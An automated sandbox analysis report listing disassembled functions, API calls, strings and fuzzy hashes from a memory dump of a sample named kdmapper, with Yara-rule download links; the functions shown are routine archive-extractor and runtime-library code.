Function 0062C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 006305DA: _wcslen.LIBCMT ref: 006305E0

Part of subcall function 0062B92D: _wcsrchr.LIBVCRUNTIME ref: 0062B944

_wcslen.LIBCMT ref: 0062C197
_wcslen.LIBCMT ref: 0062C1DF

Strings

.rar, xrefs: 0062C0E1, 0062C134
.exe, xrefs: 0062C10B
.sfx, xrefs: 0062C11A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: a4afaf619ff0ec4d27f340c14a4a69d31c551a1801c0f08b48480eba032bd81b
Instruction ID: e80af60e1eb48f362e0ab36c97691f8177c2a458d9538ffd29411b751f86fabd
Opcode Fuzzy Hash: a4afaf619ff0ec4d27f340c14a4a69d31c551a1801c0f08b48480eba032bd81b
Instruction Fuzzy Hash: 01415B21500B71D9D731AF34A816ABE73A7EF41B64F10450EFCC16B281EB514E95CB99

Function 0062BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0062BB27
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0062A275,?,?,00000800,?,0062A23A,?,0062755C), ref: 0062BBC5
_wcslen.LIBCMT ref: 0062BC3B

Strings

UNC, xrefs: 0062BBA7
\\?\, xrefs: 0062BB52, 0062BB99, 0062BBF7, 0062BC4E

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: 4798a0db7cb6d37431b010d17d678d9cc823770010c5c0146beddb30560d2fe4
Instruction ID: 81f7af86ee5a2a5ae5cfec3ebf3bdcf9c67e98f7a799b926e34ceee0a983bb1a
Opcode Fuzzy Hash: 4798a0db7cb6d37431b010d17d678d9cc823770010c5c0146beddb30560d2fe4
Instruction Fuzzy Hash: 3541D631500A35A6DF61AF20EC02EEE776BEF41391F049429F854A3251EB70EE94CFA4

Function 0063CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 0063CD84

Part of subcall function 0063AF98: _wcschr.LIBVCRUNTIME ref: 0063B033

Part of subcall function 00631FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0062C116,00000000,.exe,?,?,00000800,?,?,?,00638E3C), ref: 00631FD1

Strings

MIN, xrefs: 0063CDF5
HIDE, xrefs: 0063CDC6
MAX, xrefs: 0063CDD9
<, xrefs: 0063CD68

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcschr$CompareString
String ID: <$HIDE$MAX$MIN
API String ID: 69343711-3358265660
Opcode ID: 43d3d4547a4ad8cc3a6436e7dfeb831936efd5a6d68b2d0e1b48dacda2a0e513
Instruction ID: 07448d2efd849b7eb40870ca596df27fa712534fabc766773685fe85ca598e5e
Opcode Fuzzy Hash: 43d3d4547a4ad8cc3a6436e7dfeb831936efd5a6d68b2d0e1b48dacda2a0e513
Instruction Fuzzy Hash: E03143729002199ADF25DB54DC45EEE73BEEB15360F40856AF905E7180EBB09E848FE1

Function 0063AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0063AAD2
GetObjectW.GDI32(?,00000018,?), ref: 0063AB01
ReleaseDC.USER32(00000000,?), ref: 0063AB99

Strings

7c, xrefs: 0063AB67
-c, xrefs: 0063AB32, 0063AB3F, 0063AB73, 0063AB7F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ObjectRelease
String ID: -c$7c
API String ID: 1429681911-3403977824
Opcode ID: fd39ea1505ee81b5955e1660273aed7eab9733723b26653aa210ecd37d8d4301
Instruction ID: 9179fc34e11ba75b678d318f3e67187ccb285a15110e98a1dc43a2e68f010bb2
Opcode Fuzzy Hash: fd39ea1505ee81b5955e1660273aed7eab9733723b26653aa210ecd37d8d4301
Instruction Fuzzy Hash: D7212A72108314FFD3019FA5DC48E6FBFEAFB89B51F041919FA4692220D7319A549B62

Function 0062B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0062B9B8

Part of subcall function 00624092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006240A5

_wcschr.LIBVCRUNTIME ref: 0062B9D6
_wcschr.LIBVCRUNTIME ref: 0062B9E6

Strings

%c:\, xrefs: 0062B9AE

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 4c0a14bf84f86c279bb05e0f6ad057d85917fb3a1338da76377e79077343ea7f
Instruction ID: 9143499bd74fd4f098933ca6d06f67e6aca3297bbedf040da62c9a5b791de267
Opcode Fuzzy Hash: 4c0a14bf84f86c279bb05e0f6ad057d85917fb3a1338da76377e79077343ea7f
Instruction Fuzzy Hash: F1014963500B32659B706B35AC45D6BB79EEE86B70B54540EF544D6182FB20E44086B1

Function 0063B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

EndDialog.USER32(?,00000001), ref: 0063B2BE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0063B2D6
SetDlgItemTextW.USER32(?,00000067,?), ref: 0063B304

Strings

GETPASSWORD1, xrefs: 0063B289
xzg, xrefs: 0063B2E2

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xzg
API String ID: 445417207-3224123136
Opcode ID: ffad09e540ab2b11757841834f4695782f95f8bccaffd134db53b74a72b04b09
Instruction ID: 59b1316780393ad793541ee8e17ebb101f50771efdf65db881c65a7be59c8a01
Opcode Fuzzy Hash: ffad09e540ab2b11757841834f4695782f95f8bccaffd134db53b74a72b04b09
Instruction Fuzzy Hash: 8C11C432900128B6EB219F64AC49FFF376FEF19B00F100124FB46B62C0C7A09A4597E1

Function 0063B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0063B6ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0063B712
DeleteObject.GDI32(00000000), ref: 0063B744
DeleteObject.GDI32(00000000), ref: 0063B767

Part of subcall function 0063A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0063B73D,00000066), ref: 0063A6D5
Part of subcall function 0063A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A6EC
Part of subcall function 0063A6C2: LoadResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A703
Part of subcall function 0063A6C2: LockResource.KERNEL32(00000000,?,?,?,0063B73D,00000066), ref: 0063A712
Part of subcall function 0063A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0063B73D,00000066), ref: 0063A72D
Part of subcall function 0063A6C2: GlobalLock.KERNEL32(00000000), ref: 0063A73E
Part of subcall function 0063A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0063A762
Part of subcall function 0063A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0063A7A7
Part of subcall function 0063A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0063A7C6
Part of subcall function 0063A6C2: GlobalFree.KERNEL32(00000000), ref: 0063A7CD

Strings

], xrefs: 0063B71A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
String ID: ]
API String ID: 1797374341-3352871620
Opcode ID: 87d854abea7507d8c3b3d03eb65d9d982a913e9ebc1ede37e88b0175cb1a67ef
Instruction ID: cf2793a6b65e1677556c80071dd14167c97e9db4ea17c543fd18992ca660e9d4
Opcode Fuzzy Hash: 87d854abea7507d8c3b3d03eb65d9d982a913e9ebc1ede37e88b0175cb1a67ef
Instruction Fuzzy Hash: A901C43690011177C71177B49C0AABF7A7BEBC1B52F081114FA40B7391DF618D0553E1

Function 0063D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00621316: GetDlgItem.USER32(00000000,00003021), ref: 0062135A
Part of subcall function 00621316: SetWindowTextW.USER32(00000000,006535F4), ref: 00621370

EndDialog.USER32(?,00000001), ref: 0063D64B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0063D661
SetDlgItemTextW.USER32(?,00000066,?), ref: 0063D675
SetDlgItemTextW.USER32(?,00000068), ref: 0063D684

Strings

RENAMEDLG, xrefs: 0063D618

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 7dd4c2795e2dcfa92d4dd2847018bfe77104278a7e153fdcf6665d19bb27c208
Instruction ID: b2a29add5c34c04d5240d9b333a2e51be2ce2a4b84bf78410daca2ae07d09139
Opcode Fuzzy Hash: 7dd4c2795e2dcfa92d4dd2847018bfe77104278a7e153fdcf6665d19bb27c208
Instruction Fuzzy Hash: 54012833248220BBD3214F64BD0AF9B776FFB9BF01F110510F345AA1D0C6A299058BB5

Function 00647E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00647E24,00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002), ref: 00647E93
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00647EA6
FreeLibrary.KERNEL32(00000000,?,?,?,00647E24,00000000,?,00647DC4,00000000,0065C300,0000000C,00647F1B,00000000,00000002), ref: 00647EC9

Strings

CorExitProcess, xrefs: 00647E9E
mscoree.dll, xrefs: 00647E8C

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c90b5720a99e9dba94491417883ee971c99218f6439cc1ca83593d5f0dbc4ce9
Instruction ID: d7f79d08a480dac167a32029e6d26d7f14e2656402ecf6b29fec1c12582c1fd3
Opcode Fuzzy Hash: c90b5720a99e9dba94491417883ee971c99218f6439cc1ca83593d5f0dbc4ce9
Instruction Fuzzy Hash: F6F04431900318BBDB11DFA0DC09B9EBFB6EB44752F0141A9F805A2350DB319F44CA90

Function 0062F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0063081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00630836
Part of subcall function 0063081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0062F2D8,Crypt32.dll,00000000,0062F35C,?,?,0062F33E,?,?,?), ref: 00630858

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0062F2E4
GetProcAddress.KERNEL32(006681C8,CryptUnprotectMemory), ref: 0062F2F4

Strings

CryptUnprotectMemory, xrefs: 0062F2EA
CryptProtectMemory, xrefs: 0062F2DE
Crypt32.dll, xrefs: 0062F2CE

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 4ec81b058b01588576d1cf92b77d35d655a17e93aca67f8b1006e89cef610543
Instruction ID: 138ab6414233672fbd12808bbe7caeb04fe083fe5da54ca6e9a8e0be9f378c1b
Opcode Fuzzy Hash: 4ec81b058b01588576d1cf92b77d35d655a17e93aca67f8b1006e89cef610543
Instruction Fuzzy Hash: B9E08671910B319EDB21DF78A84DB427AE66F04F41F15882DF4DA93780D6B5D5448B50

Function 00642BDA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00642CA1
___AdjustPointer.LIBCMT ref: 00642CC4
_abort.LIBCMT ref: 00642D12
___AdjustPointer.LIBCMT ref: 00642D60

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 089763c929b144ead1f35acf94e4eadc8045eb9a2713cd498a04f582de8ec531
Instruction ID: 6c19c5c761533799a58f1b664d7ae7248eaaf5a9533d0c008900d935291547c3
Opcode Fuzzy Hash: 089763c929b144ead1f35acf94e4eadc8045eb9a2713cd498a04f582de8ec531
Instruction Fuzzy Hash: AA51BF72A00213AFDB699F14D8A5BBAB7A6FF54310F74412DF801876A1D731ED81D790

Function 0064BF30 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0064BF39
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064BF5C

Part of subcall function 00648E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0064CA2C,00000000,?,00646CBE,?,00000008,?,006491E0,?,?,?), ref: 00648E38

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0064BF82
_free.LIBCMT ref: 0064BF95
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0064BFA4

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: da2683351fb5c74184c734d19f8d0db0cac79075b8c8c90e51da425e62fca32f
Instruction ID: 797e9f223ade93c5aed4a9b02d9f7f3e8fcf78d169e684de6745aaee4f247976
Opcode Fuzzy Hash: da2683351fb5c74184c734d19f8d0db0cac79075b8c8c90e51da425e62fca32f
Instruction Fuzzy Hash: E201D472601721BF27615ABA9C4CCBB7A6FDEC2FA13141129F908C3301EF60CD0695B0

Function 00649869 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00661030,00000200,006491AD,0064617E,?,?,?,?,0062D984,?,?,?,00000004,0062D710,?), ref: 0064986E
_free.LIBCMT ref: 006498A3
_free.LIBCMT ref: 006498CA
SetLastError.KERNEL32(00000000,00653A34,00000050,00661030), ref: 006498D7
SetLastError.KERNEL32(00000000,00653A34,00000050,00661030), ref: 006498E0

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 1170f94534f2619af15700d04ac3d5eff74ec827625c2cd890ee9683fe50a11b
Instruction ID: f4996e3ad8c0007185457a9c600d9766fa73f0ff1587517564c25b28043c910a
Opcode Fuzzy Hash: 1170f94534f2619af15700d04ac3d5eff74ec827625c2cd890ee9683fe50a11b
Instruction Fuzzy Hash: A20144321C07016FC352A76CAC8995B252BDFD27B2B210639F410933D2EE218D029238

Function 00630EED Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 006311CF: ResetEvent.KERNEL32(?), ref: 006311E1
Part of subcall function 006311CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 006311F5

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00630F21
CloseHandle.KERNEL32(?,?), ref: 00630F3B
DeleteCriticalSection.KERNEL32(?), ref: 00630F54
CloseHandle.KERNEL32(?), ref: 00630F60
CloseHandle.KERNEL32(?), ref: 00630F6C

Part of subcall function 00630FE4: WaitForSingleObject.KERNEL32(?,000000FF,00631206,?), ref: 00630FEA
Part of subcall function 00630FE4: GetLastError.KERNEL32(?), ref: 00630FF6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: ce6d60afff57b69aa1090fcc52a7393c5cf5184474ae956bbf31376e5cb29d06
Instruction ID: f2c445b184fa7589c522b2de15749b2d41179b0ea0d951e095dc3a8357056d24
Opcode Fuzzy Hash: ce6d60afff57b69aa1090fcc52a7393c5cf5184474ae956bbf31376e5cb29d06
Instruction Fuzzy Hash: 23015271500754EFD7229B64DD84BC6BBABFB08B51F00092DF15A522A0C7757A54CA94

Function 0064C7FF Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0064C817

Part of subcall function 00648DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34), ref: 00648DE2
Part of subcall function 00648DCC: GetLastError.KERNEL32(00653A34,?,0064C896,00653A34,00000000,00653A34,00000000,?,0064C8BD,00653A34,00000007,00653A34,?,0064CCBA,00653A34,00653A34), ref: 00648DF4

_free.LIBCMT ref: 0064C829
_free.LIBCMT ref: 0064C83B
_free.LIBCMT ref: 0064C84D
_free.LIBCMT ref: 0064C85F

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1107eb0ad91174066f1ddbecdd2e6b15606da3d74c67a42e038ab57d3c2019b8
Instruction ID: 83b552b3e89488ac7026828176b899b37381787f1b12efa896c5f181e7e8fe61
Opcode Fuzzy Hash: 1107eb0ad91174066f1ddbecdd2e6b15606da3d74c67a42e038ab57d3c2019b8
